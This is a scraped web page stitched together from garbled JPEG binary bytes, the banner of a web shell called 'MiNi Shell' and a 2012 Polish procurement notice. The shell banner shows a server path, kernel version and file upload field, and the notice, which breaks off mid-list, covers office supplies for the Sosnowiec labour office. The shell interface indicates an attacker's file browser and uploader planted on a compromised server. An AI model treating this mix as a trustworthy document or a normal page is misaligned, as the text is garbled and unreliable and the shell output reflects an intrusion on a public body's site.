JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121120/461430-N-2012.html

<p class="kh_header"><b>Sosnowiec: Zakup i dostawa materiałów biurowych dla potrzeb Powiatowego Urzędu Pracy w Sosnowcu.</b><br>
<b>Numer ogłoszenia: 461430 - 2012; data zamieszczenia: 20.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Sosnowcu , ul. Rzeźnicza 12, 41-200 Sosnowiec, woj. śląskie, tel. 32 2661387, 2663324, 26636335, faks 32 297 87 01, 297 87 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów biurowych dla potrzeb Powiatowego Urzędu Pracy w Sosnowcu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa materiałów biurowych dla potrzeb Powiatowego Urzędu Pracy w Sosnowcu . 
Oznaczenie wg wspólnego słownika zamówień: 

Lp.	Nazwa	Opis	Ilość 
1	Zakreślasz

30192125-3		kolor zielony,
	z fluorescencyjnym tuszem na bazie wody
	szerokość linii pisania 2-5mm
	ścięta końcówka 
	do pisania po wszystkich rodzajach papieru,  w tym samokopiującym  
 i faksowym     	150 szt.
2	Zakreślasz
30192125-3		kolor żółty
	z fluorescencyjnym tuszem na bazie wody
	szerokość linii pisania 2-5mm
	ścięta końcówka 
	do pisania po wszystkich rodzajach papieru, 
w tym samokopiującym  i faksowym     	150 szt.
3	Długopis 
30192121-5		automatyczny
	wkład wielkopojemny metalowy 
z tuszem w kolorze niebieskim
	korpus w rożnych kolorach 	300 szt.
4	Klej biurowy         w sztyfcie
30190000-7		bezbarwny, bezwonny, niebrudzący, zmywalny, do klejenia papieru, tektury
	pojemność 35 g	200 szt.
5	Żółte notesy samoprzylepne
30190000-7  		bloczek o wymiarach 76x76mm
	po 100 karteczek w bloczku  	150 sztuk  
6	Korektor w taśmie
30192160-0		silikonowa taśma, wytrzymała na zerwanie 
i wilgoć
	szerokość taśmy 4,2 mm
	długość taśmy min. 8,5 m	150 szt. 
7	Korektor w płynie 
30192160-0		uniwersalny, szybkoschnący, wyposażony 
w gąbeczkę do rozprowadzania fluidu
	buteleczka poj.  20ml.	150 szt.
8	Tusz do pieczątek - czarny 
30190000-7		uniwersalny do pieczątek na kołku                      
 i automatycznych,
	opakowanie 30 ml.   	10 sztuk 
9	Tusz do pieczątek - czerwony 
30190000-7		uniwersalny do pieczątek na kołku                      
 i automatycznych,
	opakowanie 30 ml.   	20 sztuk  
10	Taśma klejąca dwustronna 
44424200-0		taśma pokryta obustronnie emulsyjnym klejem akrylowym i dodatkowo zabezpieczona warstwą papieru, 
	rolka 50mm/5 m	80 sztuk 
11	Zwilżacz do
 Palców
30190000-7		bezbarwny i bezwonny na bazie gliceryny
	pojemność 20 ml. 	
5 sztuk 


12	Zeszyt
22800000-8		format A-5, miękka oprawa 
	32 kartki,  kratka 	100 sztuk 
13	Zeszyt
22800000-8		format A-5, twarda oprawa
	96 kartek w kratkę	100 szt. 
14	Grzbiety 
do bindowania
30190000-7		Grzbiety plastikowe, kolor niebieski, zielony
	Średnica:  16 mm	2 op.
15	Grzbiety 
do bindowania 
30190000-7		Grzbiety plastikowe, kolor zielony
	Średnica: 8 mm	2 op.
16	Grzbiety 
do bindowania
30190000-7		Grzbiety plastikowe, kolor niebieski
	Średnica: 20 mm	1 op.
17	Olej do niszczarek
09211000-1		specjalna formuła opracowana do smarowania noży tnących niszczarek dokumentów , pojemność 125 ml.	8 szt. 
18	
Zszywacz biurowy
30197320-5		metalowy z plastikową obudową
	na zszywki 24/6
	możliwość i na zewnątrz
	zszywa pliki grubości do 30 kartek 
	pojemność magazynku 100 zszywek	20 szt. 
19	Spinacz
30197220-4		okrągły, metalowe
	długość 28 mm
	opakowanie 100 szt.	500 op.
20	Segregator  
30190000-7		format A-4 z mechanizmem, oklejony na zewnątrz i wewnątrz folią PP, dwustronna wymienna etykieta na grzbiecie, szerokość grzbietu 75mm 
	kolor zielony	200 szt.
21	Segregator  
30190000-7		format A-4 z mechanizmem, oklejony na zewnątrz i wewnątrz folią PP, dwustronna wymienna etykieta na grzbiecie, szerokość grzbietu 75mm 
	kolor niebieski	100 szt.
22	Segregator   
30190000-7		format A-4 z mechanizmem, oklejony na zewnątrz i wewnątrz folią PP, dwustronna wymienna etykieta na grzbiecie, szerokość grzbietu 50mm 
	kolor zielony	100 szt.
23	Segregator  
30190000-7		format A-4 z mechanizmem, oklejony na zewnątrz kolorowym, a wewnątrz jasnoszarym papierem
	samoprzylepne etykiety na grzbiecie
	szerokość grzbietu 35 mm
	2 ringi 25 mm	20 szt.
24	Nożyczki
39241200-5		satynowe ostrze wykonane ze stali nierdzewnej
	ergonomiczna wyprofilowana rękojeść wykonana z niełamliwego plastiku
	długość 21 cm	80 szt.
25	Skorowidz w twardej oprawie
22800000-8		format A5
	szyte, w twardej wytrzymałej, lakierowanej oprawie
	wyposażone w tłoczony indeks
	w kratkę 	50 szt.
26	Skorowidz w twardej oprawie
22800000-8		format A4
	szyte, w twardej wytrzymałej, lakierowanej oprawie
	wyposażone w tłoczony indeks
	w kratkę  	50 szt.
27	Ołówek
30192130-1		wykonany z żywicy syntetycznej 
	super trwały, niełamliwy grafit
	z gumką do ścierania u góry	200 szt.
28	Wkład 
do długopisu
30190000-7		wkład wielkopojemny, metalowy 
	tusz odporny na działanie światła i wody
	tusz niebieski  	1.000 szt.
29	Skoroszyt plastikowy sztywny
22800000-7		przednia okładka przeźroczysta sztywna, druga kolorowa - żółty 
wykonana z mocnego sztywnego PCV, wyposażona w papierowy, wysuwany pasek do opisów, wyposażony w boczną perforację, umożliwiającą wpięcie do segregatora  	100 szt.
30	Skoroszyt plastikowy sztywny
22800000-8		przednia okładka przeźroczysta sztywna, druga kolorowa - zielona
	wykonana z mocnego sztywnego PCV, wyposażony w papierowy, wysuwany pasek do opisów, wyposażony w boczną perforację, umożliwiającą wpięcie do segregatora  	100 szt.
31	Kartki 
do pojemnika
 plastikowego  
30197600-2		bloczek, kostka wielokolorowa, nieklejona 
	wymiar 8,5x8,5x4 cm	150 szt. 
32	Dziurkacz
30197330-8		Metalowy
	Średnica otworu 6 mm
	Dziurkuje do 30 kartek	15 szt.
33	Sznurek 
39541130-6		dratwa
	waga 0,5 kg	50 szt.
34	Długopis 
na sprężynce 
z podstawką
30192121-5		Długopis  na sprężynce stojący
	Estetyczny, wygodny w użyciu długopis połączony rozciągliwą  sprężynką z samoprzylepną podstawką, utrzymującą długopis 
w pozycji pionowej 
	Kolor tuszu: niebieski	40 szt.
35	kalendarze stojące poziome na biurko
30196100-0		kalendarze stojące na biurko na podstawce PCV	130 szt.
36	kalendarze wiszące trójdzielne 
na ścianę  
30199792-8		kalendarze ścienne, trójdzielne, kalendarium 3 miesiące na 1 planszy, okienko przesuwne do zaznaczenia bieżącej daty	120 szt.
37	Kalendarz- podkład na biurko A2 z listwą (BIUWAR)
30196100-0		kalendarium  na 2013, miejsce  na notatki dla poszczególnych dni tygodnia oraz zakratkowane pole do notatek	25 szt. 
38	Marker
30237430-2
		kolor czarny 
	permanentny, okrągła końcówka
	piktogramy na korpusie informujące o jego zastosowaniu
	tusz na bazie alkoholu o naturalnym zapachu  akrylowa blokada końcówki	200 szt.
39	
Marker
30237430-2
		kolor niebieski
	permanentny, okrągła końcówka
	piktogramy na korpusie informujące o jego zastosowaniu
	tusz na bazie alkoholu o naturalnym zapachu  akrylowa blokada końcówki	200 szt.
40	Cienkopis
30192125-3		kolor zielony   
	tusz odporny na wysychanie
	fibrowa, plastikowa końcówka oprawiona                     w metal 
	wentylowana skuwka
	grubość linii  pisania 0,4 mm	100 szt.
41	Cienkopis
30192125-3		kolor czerwony  
	tusz odporny na wysychanie
	fibrowa, plastikowa końcówka oprawiona                     w metal 
	wentylowana skuwka
	grubość linii  pisania 0,4 mm	100 szt.
42	Cienkopis
30192125-3		kolor czarny 
	tusz odporny na wysychanie
	fibrowa, plastikowa końcówka oprawiona                     w metal 
	wentylowana skuwka
	grubość linii  pisania 0,4 mm	100 szt.
43	Taśma 
klejąca biurowa 
44424200-0
		przeźroczysta
	pokryta klejem akrylowym
	wymiary 18mm x 20 m	150 szt.
44	Taśma 
klejąca biurowa 
44424200-0
		przeźroczysta
	pokryta klejem akrylowym
	wymiary 24mm x 20 m	150 szt.
45	Zszywki
30197100-7
		rozmiar 24/6
	zszywa pliki grubości do  20 kartek
	opakowanie 100 sztuk	200 op.
46	Rozszywacz 
30197321-2
		uniwersalny do wszystkich rodzajów zszywek
	z blokadą zabezpieczającą przed skaleczeniem,	40 szt.
47	Ofertówka krystaliczna 
30190000-7
		wykonane z przezroczystej folii PCV
	otwierane u góry i po prawej stronie
	opakowanie 25 sztuk w folii	1.000 szt.
48	Teczka z gumką lakierowana
30190000-7
		wykonana z mocnego i lakierowanego z jednej strony kartonu, z mocną gumką  i trzema zakładkami chroniącymi dokumenty przed wypadaniem  - kolor zielony	100 szt.
49	Teczka z gumką lakierowana
30190000-7		wykonana z mocnego i lakierowanego z jednej strony kartonu, z mocną gumką  i trzema zakładkami chroniącymi dokumenty przed wypadaniem  - kolor czerwony	100 szt.
50	
Marker
30237430-2
		 kolor czerwony 
	permanentny, okrągła końcówka
	piktogramy na korpusie informujące o jego zastosowaniu
	tusz na bazie alkoholu o naturalnym zapachu  akrylowa blokada końcówki	100 szt.
51	Skoroszyt plastikowy sztywny 
22852100-8		przednia okładka przeźroczysta sztywna, druga kolorowa - czerwona
	wykonana z mocnego sztywnego PCV, wyposażony w papierowy, wysuwany pasek do opisów, wyposażony w boczną perforację, umożliwiającą wpięcie do segregatora  	200 szt.
52	Folia kopiująca do telefaksu 
PANASONIC - oryginalna 
30125100		Typ KX - FA 52X 
	Długość 30 m.
	2 sztuki w opakowaniu	30 op.
53	Koszulka groszkowa
30190000-7		Format A - 4 
	Wykonana z folii PP
	Multiperforowana - pasuje do każdego segregatora
	Opakowanie 100 sztuk
	Grubość 48 mic.  	200 op. 
54	Teczka wiązana kartonowa
30190000-7		Teczka kartonowa wiązana, do przenoszenia 
i przechowywania dokumentów.
	Kolor: biały. Format A4	200 op.
55	Skoroszyt kartonowy 
oczkowy pełny 
22852100-8
		Wykonana z kartonu grubości 250g/m2
	Kolor biały 
	Format A - 4	5.000 szt.
56	Linijka plastikowa
30190000-7		długość 20cm.	40 szt.
57	Gumka biurowa
30190000-7		przeznaczona do wymazywania ołówka tradycyjnego i automatycznego 
	wymiary: 54x23x13mm	50 szt.
58	Temperówka
30190000-7		okrągła, plastikowa z pojemnikiem na ostrużyny	50 szt.
59	Długopis  
30192121-5		z wymiennym wkładem w kolorze niebieskim;
	plastikowa przeźroczysta obudowa umożliwiająca obserwację zużycia tuszu;
	wymienny wkład z końcówką o grubości   
0,7 mm; 
	zakończenie i skuwka w kolorze tuszu	100 szt. 
60	Samoprzylepne zakładki indeksujące
30190000-7		praktyczne narzędzie do zaznaczania stron
	możliwość wielokrotnego przyklejania 
i odklejania	100 op.
61	Teczka skrzydełkowa na rzep
30190000-7		wykonana z twardej i sztywnej tektury (2mm) powklejanej folią polipropylenową
	format A4 z zamknięciem na 2 rzepy	10 szt.
62	Komplet 4 markery z gąbką
30195911-1		do tablic suchościeralnych
	markery w kolorach: czarnym,  czerwonym, niebieskim i zielonym	5 kompletów
63	Papier ksero 
format A-4
 (papier kserograficzny)
30197644-2		Przeznaczony do wysoko -nakładowych drukarek i kopiarek: laserowych 
       i atramentowych. 
	Idealny do czarno - białych codziennych dokumentów i korespondencji wewnętrznej.
	O wysokiej białości, obustronnej gładkości 
	Gramatura 80g/m2
	Białość CIE 166
	Opakowanie 1 ryza (500 arkuszy)	2.200 ryz
64	Koperty samoprzylepne 
Format C - 6
30199230-1		Koperty białe, pełne (bez okna)
	Samoprzylepne
	Opakowanie 1.000 sztuk	80 op.
65	Koperty 
30199230-1		format B-4 (250x353mm)
	białe, samoprzylepne  	1.000 szt.
66	Koperty 
30199230-1		format B-5 (176x250mm)
	białe, samoprzylepne  	1.000 szt.
67	Koperty 
 z rozszerzonymi bokami i dnem
30199230-1		koperty do wysyłania dużej ilości dokumentów,
	samoklejąca z paskiem
	wykonane z papieru o gramaturze 120-150 g/m2	1.000 szt.
68	Karty kontowe
228000008		 format A-4, druk dwustronny
	bloczek 100 szt.	2 bloczki
69	PK - Polecenie księgowania
228000008		format A-5, druk jednostronny,
papier offsetowy
	bloczek 80 kartek	20 bloczków
70	 KW - Dowód wypłaty
228000008		 format A-6, druk jednostronny (wielokopia), papier samokopiujący 
	bloczek 80 kartek 	25 bloczków
71	KP - Dowód wpłaty
228000008		 format A-6, druk jednostronny (wielokopia), papier samokopiujący
	bloczek 80 kartek	25 bloczków
72	Raport kasowy
228000008		format A-4, druk jednostronny (oryginał + kopia), papier samokopiujący
	bloczek 80 kartek 
	10 bloczków.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.25-3, 30.19.21.21-5, 30.19.00.00-7, 30.19.21.60-0, 44.42.42.00-0, 22.80.00.00-8, 09.21.10.00-1, 30.19.73.20-5, 30.19.72.20-4, 39.24.12.00-5, 30.19.21.30-1, 30.19.76.00-2, 30.19.73.30-8, 39.54.11.30-6, 30.19.21.21-5, 30.19.61.00-0, 30.19.97.92-8, 30.23.74.30-2, 30.19.21.25-3, 44.42.42.00-0, 30.19.73.21-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien udokumentować posiadanie wiedzy i doświadczenia  poprzez wykazanie realizacji przynajmniej         3 zamówień o charakterze i wartości porównywalnej z przedmiotem niniejszego zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia 	działalności jest krótszy - w tym okresie.
Opis sposobu dokonywania oceny spełniania tego warunku 
Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie metodą spełnia - nie spełnia na podstawie dołączonych do oferty oświadczeń i dokumentów tj. wykazanie realizacji przynajmniej 3 zamówień o charakterze       i wartości porównywalnej z przedmiotem niniejszego zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia 	działalności jest krótszy - w tym okresie.
Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie  każdego zamówienia - listy referencyjne.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać posiadanie na rachunku bankowym środków finansowych w kwocie co najmniej 10.000 PLN lub zdolność kredytową na 10.000 PLN w okresie nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Opis sposobu dokonywania oceny spełniania tego warunku 
Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie metodą spełnia - nie spełnia na podstawie dołączonych do oferty oświadczeń i dokumentów tj. informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych    w kwocie co najmniej 10.000 PLN lub zdolność kredytową Wykonawcy w kwocie co najmniej 10.000 PLN, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert;   

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go                 z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

